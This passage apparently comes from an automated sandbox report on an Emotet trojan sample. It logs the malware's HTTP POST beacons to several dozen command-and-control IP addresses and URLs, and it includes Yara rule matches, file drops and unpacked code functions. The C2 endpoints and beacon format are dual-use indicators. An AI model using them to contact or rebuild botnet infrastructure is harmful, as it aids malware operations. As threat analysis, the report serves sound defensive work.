  Connection: keep-alive
  Referer: 61.19.246.238/Gm1WL3Kb/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=------------H7vKgpo0TK2t
  Host: 61.19.246.238:443
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 156.155.166.221/yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=---------84P2IJMkL
  Host: 156.155.166.221
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=--------------------pU7FVH6UNlQM04HdUu46
  Host: 50.35.17.13
  Content-Length: 4628
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/ HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Connection: keep-alive
  Referer: 153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=----------------5UCIEVFUgKC9ns3t
  Host: 153.137.36.142
  Content-Length: 4628
  Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.211.88.52/UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------ayNnG1JNfmOIUancEJINhPHost: 91.211.88.52:7080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /mf37D3hHo2BT/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 209.141.54.221/mf37D3hHo2BT/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------CRPJROu8mMuITH9VHost: 209.141.54.221:8080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 185.94.252.104/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2aCyOD7bcdtE/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------3hc2nliStBsMSODJE62qalnHost: 185.94.252.104:443Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /Ddrl52fpHV0Ytv/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.45.13.118/Ddrl52fpHV0Ytv/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------BqLyxgk1GkivHaCG9jHost: 174.45.13.118Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 87.106.136.232/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------5VkCfPKqCtHost: 87.106.136.232:8080Content-Length: 4628Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------F7zfpJ936gHost: 62.75.141.82Content-Length: 4628Cache-Control: no-cache
              Source: unknown | TCP traffic detected without corresponding DNS query: 71.72.196.159 (6 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 134.209.36.254 (4 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 120.138.30.150 (6 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.216.33 (6 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 157.245.99.39 (4 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 137.59.187.107 (6 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 94.23.237.171 (4 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 61.19.246.238 (4 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 156.155.166.221 (4 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 50.35.17.13 (4 events)
              Source: unknown | TCP traffic detected without corresponding DNS query: 153.137.36.142 (2 events)
              Source: unknown | HTTP traffic detected: POST /U79iM382/IZ04Joc/eLC1daPUos8/ HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate | DNT: 1 | Connection: keep-alive | Referer: 71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/ | Upgrade-Insecure-Requests: 1 | Content-Type: multipart/form-data; boundary=------------cs4fTNfbtTQb | Host: 71.72.196.159 | Content-Length: 4660 | Cache-Control: no-cache
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://120.138.30.150:8080/3c7L3qI9O7w/Rm0uJBYq9TtaH/
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://120.138.30.150:8080/3c7L3qI9O7w/Rm0uJBYq9TtaH/u%
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://134.209.36.254:8080/T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyug
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://137.59.187.107:8080/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/
              Source: Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://137.59.187.107:8080/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/S7
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/h5
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://156.155.166.221/yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://157.245.99.39:8080/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://157.245.99.39:8080/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/1=
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://157.245.99.39:8080/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/z=sU
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/$=
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/N5
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://174.45.13.118/Ddrl52fpHV0Ytv/N=
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.94.252.104:443/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECr
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.94.252.104:443/iXgMw5IajHPl8YAN7YB/fMpMhY2ZgzV/1nmECrP2Ezqoam/NWXlULDZs3bsJjB/p3LYI79/w2a
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/shqos.dll.muixj
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://61.19.246.238:443/Gm1WL3Kb/
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://61.19.246.238:443/Gm1WL3Kb/8
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://61.19.246.238:443/Gm1WL3Kb/LQn/ANk4kL9bS/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/%
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/J/
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/O
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/m;%T
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.75.141.82/9HkMmi/SILN3JKyaX8hSqvMF38/aphjJUbJpUw/J8LsQXmX6qW1KnnNp/dmiOqQTXBol2TIb9pL/tory
              Source: Websocket.exe, 00000002.00000003.2550427830.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://87.106.136.232:8080/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://87.106.136.232:8080/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/ZI-T
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002994000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://87.106.136.232:8080/gfPMhF/Be2SElHPLyLeACf/UucmketfQMMC3NqYN/~
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.2934884982.0000000002998000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/
              Source: Websocket.exe, 00000002.00000003.2660753849.0000000002998000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/-467a0a8f1198bBKT
              Source: Websocket.exe, 00000002.00000002.3638576164.0000000002970000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/B
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/F~;T
              Source: Websocket.exe, 00000002.00000002.3638024971.00000000007EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/fy
              Source: Websocket.exe, 00000002.00000003.3005905191.0000000002999000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.23.237.171:443/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/lrI
              Source: unknown | Network traffic detected: HTTP traffic on port 62405 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 62411 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62404
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62405
              Source: unknown | Network traffic detected: HTTP traffic on port 62404 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 62411

              E-Banking Fraud

              Source: Yara match | File source: 2.2.Websocket.exe.60279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ExeFile (356).exe.5f279e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ExeFile (356).exe.5f279e.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ExeFile (356).exe.600000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.Websocket.exe.60052e.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.Websocket.exe.60052e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ExeFile (356).exe.5f052e.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.ExeFile (356).exe.5f052e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.Websocket.exe.60279e.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 2.2.Websocket.exe.610000.4.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_006125A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey

              System Summary

              Source: 2.2.Websocket.exe.60279e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f279e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f279e.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.600000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.60052e.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.60052e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f052e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 0.2.ExeFile (356).exe.5f052e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.60279e.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 2.2.Websocket.exe.610000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2389548651.00000000020E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.3637813859.0000000000734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.3637503164.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Emotet_5528b3b0 Author: unknown
              Source: C:\Users\user\Desktop\ExeFile (356).exe | File created: C:\Windows\SysWOW64\provcore\
              Source: C:\Users\user\Desktop\ExeFile (356).exe | File deleted: C:\Windows\SysWOW64\provcore\Websocket.exe:Zone.Identifier
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_006080D0
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_00607D60
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_00601C70
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_00607530
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_006063F0
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_005F9C6E
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_005F380E
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_005F90CE
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_005F98FE
              Source: C:\Users\user\Desktop\ExeFile (356).exe | Code function: 0_2_005F7F8E
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_006180D0
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_00611C70
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_00617D60
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_00617530
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_006163F0
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_00609C6E
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_0060380E
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_006098FE
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_006090CE
              Source: C:\Windows\SysWOW64\provcore\Websocket.exe | Code function: 2_2_00607F8E
              Source: ExeFile (356).exe | Static PE information: Resource name: DAGHHHHHTY type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Source: ExeFile (356).exe, 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp | Binary or memory string: OriginalFilenameVfWWDM32.DLLj% vs ExeFile (356).exe
              Source: ExeFile (356).exe | Binary or memory string: OriginalFilenameVfWWDM32.DLLj% vs ExeFile (356).exe
              Source: ExeFile (356).exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 2.2.Websocket.exe.60279e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f279e.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.5f279e.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
              Source: 0.2.ExeFile (356).exe.600000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Emotet_5528b3b0 reference_sample = eeb13cd51faa7c23d9a40241d03beb239626fbf3efe1dbbfa3994fc10dea0827, os = windows, severity = x86, creation_date = 2021-11-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 717ed656d1bd4ba0e4dae8e47268e2c068dad3e3e883ff6da2f951d61f1be642, id = 5528b3b0-d4cb-485e-bc0c-96415ec3a795, last_modified = 2022-01-13
